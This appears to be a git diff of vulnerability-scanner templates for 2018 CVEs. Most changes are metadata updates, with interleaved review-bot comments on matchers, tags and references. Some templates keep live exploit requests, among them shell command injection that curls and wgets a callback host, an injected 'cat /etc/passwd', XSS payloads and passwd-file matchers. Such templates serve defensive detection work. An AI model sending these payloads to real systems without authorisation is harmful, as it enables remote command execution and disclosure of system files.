@@ -15,18 +15,19 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000533 cwe-id: CWE-20 + epss-score: 0.97207 cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:* - epss-score: 0.97249 - tags: git,cve,cve2018,gitlist,vulhub,rce metadata: max-request: 2 + vendor: gitlist + product: gitlist + tags: git,cve,cve2018,gitlist,vulhub,rce http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /{{path}}/tree/a/search HTTP/1.1 Host: {{Hostname}} @@ -34,17 +35,17 @@ http: query=--open-files-in-pager=cat%20/etc/passwd + matchers: + - type: word + part: body + words: + - "root:/root:/bin/bash" + extractors: - type: regex name: path group: 1 - internal: true - part: body regex: - '(.*?)' - - matchers: - - type: word - words: - - "root:/root:/bin/bash" + internal: true part: body diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index 828b660f02..728b0894ef 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -5,7 +5,7 @@ info: author: geeknik severity: high description: | - Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins. + Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins. reference: - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915 - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ 
@@ -16,9 +16,14 @@ info: cvss-score: 8.8 cve-id: CVE-2018-1000600 cwe-id: CWE-200 - tags: cve,cve2018,jenkins,ssrf,oast,github + epss-score: 0.95579 + cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 + framework: jenkins + vendor: jenkins + product: github + tags: cve,cve2018,jenkins,ssrf,oast,github http: - method: GET diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 602d4e3a03..d87dad94c5 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -9,15 +9,21 @@ info: - https://github.com/sympa-community/sympa/issues/268 - https://vuldb.com/?id.123670 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671 + - https://lists.debian.org/debian-lts-announce/2018/09/msg00023.html + - https://lists.debian.org/debian-lts-announce/2020/11/msg00015.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-1000671 cwe-id: CWE-601 + epss-score: 0.00831 + cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"sympa" verified: true + vendor: sympa + product: sympa tags: cve,cve2018,redirect,sympa,debian http: diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index b0b76eeeae..bd398df9a8 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -14,14 +14,17 @@ info: cvss-score: 4.8 cve-id: CVE-2018-1000856 cwe-id: CWE-79 + epss-score: 0.00101 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: max-request: 3 verified: true + vendor: domainmod + product: domainmod tags: cve,cve2018,domainmod,xss,authenticated http: - raw: - - | POST / HTTP/1.1 Host: {{Hostname}} @@ -34,7 +37,6 @@ http: Content-Type: application/x-www-form-urlencoded new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test - - | GET /segments/ HTTP/1.1 Host: {{Hostname}} 
@@ -43,6 +45,7 @@ http: cookie-reuse: true host-redirects: true max-redirects: 3 + matchers-condition: and matchers: - type: word diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index 67d5769414..a6151d39bc 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -9,16 +9,20 @@ info: - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861 - https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595 - - http://web.archive.org/web/20210421212616/https://www.securityfocus.com/bid/106176 + - http://packetstormsecurity.com/files/166778/Jenkins-Remote-Code-Execution.html + - https://access.redhat.com/errata/RHBA-2019:0024 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1000861 cwe-id: CWE-502 - epss-score: 0.97348 - tags: kev,vulhub,cve,cve2018,rce,jenkins + epss-score: 0.97412 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 1 + vendor: jenkins + product: jenkins + tags: packetstorm,kev,vulhub,cve,cve2018,rce,jenkins http: - method: GET @@ -27,11 +31,10 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "package#vulntest" - part: body - type: status status: diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index 4273463bec..bab9584516 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -16,9 +16,13 @@ info: cvss-score: 8.8 cve-id: CVE-2018-10093 cwe-id: CWE-862 - tags: cve,cve2018,rce,iot,audiocode,edb,seclists + epss-score: 0.06287 + cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: audiocodes + product: 420hd_ip_phone_firmware + tags: cve,cve2018,rce,iot,audiocode,edb,seclists http: - method: GET 
@@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "admin:.*:*sh$" diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index 1273af5a80..dcbcdc6307 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -11,14 +11,19 @@ info: - https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56 - https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog - https://nvd.nist.gov/vuln/detail/CVE-2018-10095 + - http://www.openwall.com/lists/oss-security/2018/05/21/3 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-10095 cwe-id: CWE-79 - tags: cve,cve2018,xss,dolibarr + epss-score: 0.95296 + cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dolibarr + product: dolibarr + tags: cve,cve2018,xss,dolibarr http: - method: GET @@ -28,15 +33,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index d167202ec1..c7b4fd2fad 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -13,9 +13,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-10141 cwe-id: CWE-79 - tags: cve,cve2018,panos,vpn,globalprotect,xss + epss-score: 0.00126 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: paloaltonetworks + product: pan-os + tags: cve,cve2018,panos,vpn,globalprotect,xss http: - method: GET diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index c3ea669cef..4a6658a245 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml 
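Review bot: The regex `admin:.*:*sh$` in the CVE-2018-10093 `@@ -27,7 +31,6 @@` hunk is anchored with `$` but carries no `(?m)` flag, and in the Go regexp engine nuclei uses an unflagged `$` matches only at the very end of the text, so the matcher misses any `/etc/passwd` dump where the `admin` entry is not the last line or the body ends with a newline. `:*` also reads as zero-or-more colons rather than a path separator, so the pattern is looser than it looks. The CVE-2018-11784 template in this same diff shows the convention for line-anchored matching; `- "(?m)^admin:.*:.*sh$"` states the intent and works per line. The `matchers-condition: and` list this matcher belongs to continues outside the hunk.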
@@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-10201 - http://www.kwell.net/kwell_blog/?p=5199 - https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es + - https://support.ncomputing.com/portal/kb/articles/ncomputing-health-monitor-server-vulnerability-patch classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-10201 cwe-id: CWE-22 - tags: cve2018,ncomputing,lfi,packetstorm,cve + epss-score: 0.07642 + cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:* metadata: max-request: 4 + vendor: ncomputing + product: vspace_pro + tags: cve2018,ncomputing,lfi,packetstorm,cve http: - method: GET diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 87485aa36f..e2ad284c7d 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-10230 cwe-id: CWE-79 - tags: cve,cve2018,xss,zend + epss-score: 0.00122 + cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zend + product: zend_server + tags: cve,cve2018,xss,zend http: - method: GET diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index fcb271bd0f..8c4b6802f1 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -15,10 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-10562 cwe-id: CWE-78 - tags: cve,cve2018,dasan,gpon,rce,oast,kev + epss-score: 0.97572 + cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 - + vendor: dasannetworks + product: gpon_router_firmware + tags: cve,cve2018,dasan,gpon,rce,oast,kev variables: useragent: '{{rand_base(6)}}' 
@@ -29,7 +32,6 @@ http: Host: {{Hostname}} XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0 - - | POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} @@ -37,10 +39,11 @@ http: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0 stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2018/CVE-2018-10818.yaml b/http/cves/2018/CVE-2018-10818.yaml index cdd181294b..3cf9e915dc 100644 --- a/http/cves/2018/CVE-2018-10818.yaml +++ b/http/cves/2018/CVE-2018-10818.yaml @@ -11,10 +11,9 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818 classification: cve-id: CVE-2018-10818 - tags: cve,cve2018,lg-nas,rce,oast,injection metadata: max-request: 2 - + tags: cve,cve2018,lg-nas,rce,oast,injection variables: useragent: '{{rand_base(6)}}' @@ -26,7 +25,6 @@ http: Content-Type: application/x-www-form-urlencoded &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' - - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} @@ -35,10 +33,11 @@ http: &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index 5a3f6975c5..4027b5e6d1 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml 
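Review bot: CVE-2018-10818's `@@ -11,10 +11,9 @@` hunk only relocates `tags`, leaving `classification` with a bare `cve-id` and no `cvss-metrics`, `cvss-score`, `cwe-id`, `epss-score` or `cpe`, while every other template touched in this commit gains `epss-score`, `cpe`, `vendor` and `product`; the only reference is the MITRE record. The visible payloads (`uid=10; curl ...` and `task_number=1;curl ...`) are shell command injection, so `cwe-id: CWE-78` plus a `vendor`/`product` pair under `metadata` would make this entry filterable like the rest, assuming NVD supplies a CPE for the LG NAS firmware. The raw requests and the remaining matchers are in the later hunks of this file.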
@@ -15,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10822 cwe-id: CWE-22 - tags: dlink,edb,seclists,cve,cve2018,lfi,router + epss-score: 0.17386 + cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dlink + product: dwr-116_firmware + tags: dlink,edb,seclists,cve,cve2018,lfi,router http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index 2baa18175b..a617e33af6 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -16,9 +16,13 @@ info: cvss-score: 8.8 cve-id: CVE-2018-10823 cwe-id: CWE-78 - tags: cve2018,rce,iot,dlink,router,edb,seclists,cve + epss-score: 0.96863 + cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dlink + product: dwr-116_firmware + tags: cve2018,rce,iot,dlink,router,edb,seclists,cve http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 914c36795e..9edb1bcbbd 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10956 cwe-id: CWE-22 + epss-score: 0.68675 + cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Orchid Core VMS" + vendor: ipconfigure + product: orchid_core_vms tags: cve,cve2018,orchid,vms,lfi,edb http: diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 45cd14d7f4..c8c93e743f 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml 
@@ -10,15 +10,20 @@ info: - https://github.com/monstra-cms/monstra/issues/438 - https://www.exploit-db.com/exploits/44646 - https://nvd.nist.gov/vuln/detail/CVE-2018-11227 + - https://github.com/monstra-cms/monstra/issues classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11227 cwe-id: CWE-79 + epss-score: 0.02667 + cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:419828698 verified: true + vendor: monstra + product: monstra_cms tags: cve,cve2018,xss,mostra,mostracms,cms,edb http: @@ -37,8 +42,8 @@ http: words: - ">" - "Monstra" - condition: and case-insensitive: true + condition: and - type: word part: header diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index a2401ed241..41eb8a6e76 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -15,10 +15,14 @@ info: cvss-score: 8.1 cve-id: CVE-2018-11231 cwe-id: CWE-89 - tags: cve,cve2018,opencart,sqli + epss-score: 0.00903 + cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* metadata: max-request: 1 - + framework: opencart + vendor: divido + product: divido + tags: cve,cve2018,opencart,sqli,intrusive variables: num: "999999999" @@ -32,13 +36,13 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - - type: word part: body words: - - '{{md5({{num}})}}' + - "{{md5({{num}})}}" - type: status status: diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index d2076761f0..23a12a6565 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml 
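Review bot: The reference added in the CVE-2018-11227 `@@ -10,15 +10,20 @@` hunk, `https://github.com/monstra-cms/monstra/issues`, is the repository's issue index rather than an advisory, and the specific report `issues/438` is already listed two lines above, so the new line gives a reader nothing to follow. In the same hunk the commit declares `vendor: monstra` / `product: monstra_cms` while the tags still read `mostra,mostracms`, which misspell the product and will not match a `-tags monstra` filter; `tags: cve,cve2018,xss,monstra,monstracms,cms,edb` would align them (keep the old spellings alongside if existing workflows depend on them). The same misspelt tags appear in CVE-2018-11473 further down this diff.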
@@ -10,25 +10,32 @@ info: - https://www.exploit-db.com/exploits/44865/ - http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148 - https://nvd.nist.gov/vuln/detail/CVE-2018-11409 + - http://www.securitytracker.com/id/1041148 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-11409 cwe-id: CWE-200 - tags: edb,cve,cve2018,splunk + epss-score: 0.95561 + cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: splunk + product: splunk + tags: edb,cve,cve2018,splunk http: - method: GET path: - '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json' - '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json' + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - licenseKeys + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 2043ac7df7..3e263f23e5 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -15,10 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-11473 cwe-id: CWE-79 + epss-score: 0.00097 + cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.favicon.hash:419828698 verified: true + vendor: monstra + product: monstra tags: cve,cve2018,xss,mostra,mostracms,cms http: @@ -26,7 +30,6 @@ http: - | GET /users/registration HTTP/1.1 Host: {{Hostname}} - - | POST /users/registration HTTP/1.1 Host: {{Hostname}} @@ -35,6 +38,7 @@ http: csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -42,8 +46,8 @@ http: words: - ">" - "Monstra" - condition: and case-insensitive: true + condition: and - type: word part: header 
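Review bot: The CVE-2018-11409 `@@ -10,25 +10,32 @@` hunk adds `http://www.securitytracker.com/id/1041148` directly under an existing `web.archive.org` capture of the same page, so the reference list now carries one resource twice, and the archived copy presumably exists because the live securitytracker.com URL no longer resolves. Drop the new line, or replace the archived entry with it only after confirming the live page still serves the advisory. The matcher reorder with `matchers-condition: and` is fine; note the `licenseKeys` word matcher has no `part:` and relies on nuclei's body default.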
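Review bot: The CVE-2018-11473 `@@ -35,6 +38,7 @@` hunk adds `matchers-condition: and` but leaves this template without the `intrusive` tag, even though its second request `POST /users/registration` creates a persistent account (`login=test`, a fixed password, `email=teest@gmail.com`) on the target, which is the same kind of state change this commit tags as `intrusive` on CVE-2018-1335, CVE-2018-11231 and CVE-2018-14728. The tags line lives in this file's earlier `@@ -15,10 +15,14 @@` hunk; `tags: cve,cve2018,xss,mostra,mostracms,cms,intrusive` would keep default scans from creating users on every Monstra instance they touch. The `&register=Register` parameter renders here as `®ister`, which looks like an HTML-entity artifact of the listing rather than template content, but the raw file is worth checking. The raw request list this belongs to begins in the preceding hunk.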
@@ -57,8 +61,8 @@ http: extractors: - type: regex name: csrf - part: body group: 1 regex: - 'id="csrf" name="csrf" value="(.*)">' internal: true + part: body diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index 79108b6df7..0706563a6d 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -9,14 +9,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-11709 - https://wordpress.org/plugins/wpforo/#developers - https://wpvulndb.com/vulnerabilities/9090 + - https://blog.dewhurstsecurity.com/2018/06/01/wp-foro-wordpress-plugin-xss-vulnerability.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11709 cwe-id: CWE-79 - tags: cve,cve2018,wordpress,xss,wp-plugin + epss-score: 0.00151 + cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: gvectors + product: wpforo_forum + tags: cve,cve2018,wordpress,xss,wp-plugin http: - method: GET @@ -26,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index dbdc480de9..f707d7dbda 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml 
@@ -9,17 +9,21 @@ info: reference: - https://github.com/immunIT/CVE-2018-11759 - https://lists.apache.org/thread.html/6d564bb0ab73d6b3efdd1d6b1c075d1a2c84ecd84a4159d6122529ad@%3Cannounce.tomcat.apache.org%3E - - http://web.archive.org/web/20210518152646/https://www.securityfocus.com/bid/105888 - https://lists.debian.org/debian-lts-announce/2018/12/msg00007.html - https://nvd.nist.gov/vuln/detail/CVE-2018-11759 + - https://access.redhat.com/errata/RHSA-2019:0366 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-11759 cwe-id: CWE-22 + epss-score: 0.97485 + cpe: cpe:2.3:a:apache:tomcat_jk_connector:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: title:"Apache Tomcat" + vendor: apache + product: tomcat_jk_connector tags: cve,cve2018,apache,tomcat,httpd,mod-jk http: diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 9eee07e449..7e630fd38e 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -11,14 +11,19 @@ info: - https://cwiki.apache.org/confluence/display/WW/S2-057 - https://security.netapp.com/advisory/ntap-20180822-0001/ - https://nvd.nist.gov/vuln/detail/CVE-2018-11776 + - http://packetstormsecurity.com/files/172830/Apache-Struts-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-11776 cwe-id: CWE-20 - tags: cve,cve2018,apache,rce,struts,kev + epss-score: 0.97562 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: packetstorm,cve,cve2018,apache,rce,struts,kev http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 928d2943b8..ee42904d71 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml 
@@ -9,16 +9,22 @@ info: reference: - https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2018-11784 - - http://web.archive.org/web/20210509082244/https://www.securityfocus.com/bid/105524 + - http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00030.html + - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00056.html + - http://packetstormsecurity.com/files/163456/Apache-Tomcat-9.0.0M1-Open-Redirect.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N cvss-score: 4.3 cve-id: CVE-2018-11784 cwe-id: CWE-601 + epss-score: 0.9667 + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Apache Tomcat" - tags: tomcat,redirect,cve,cve2018,apache + vendor: apache + product: tomcat + tags: packetstorm,tomcat,redirect,cve,cve2018,apache http: - method: GET @@ -28,11 +34,11 @@ http: matchers-condition: and matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - part: header - type: status + negative: true status: - 404 - negative: true diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 1b8a9c573a..b287150ce1 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -14,9 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-12031 cwe-id: CWE-22 - tags: edb,cve,cve2018,lfi + epss-score: 0.01411 + cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: eaton + product: intelligent_power_manager + tags: edb,cve,cve2018,lfi http: - method: GET 
@@ -27,11 +31,12 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or - part: body + - type: status status: - 200 diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index bd2d4d393c..17efc68af9 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -15,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12054 cwe-id: CWE-22 - tags: cve,cve2018,lfi,edb + epss-score: 0.55866 + cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: schools_alert_management_script_project + product: schools_alert_management_script + tags: cve,cve2018,lfi,edb http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 06ad0854d8..5caa81ff85 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -13,21 +13,27 @@ info: - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py - https://nvd.nist.gov/vuln/detail/CVE-2018-1207 - http://en.community.dell.com/techcenter/extras/m/white_papers/20485410 + - https://twitter.com/nicowaisman/status/977279766792466432 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1207 cwe-id: CWE-94 - tags: cve,cve2018,dell,injection,rce + epss-score: 0.03417 + cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dell + product: emc_idrac7 + tags: cve,cve2018,dell,injection,rce http: - method: GET path: - "{{BaseURL}}/cgi-bin/login?LD_DEBUG=files" + matchers: - type: word + part: response words: - "calling init: /lib/" - part: response 
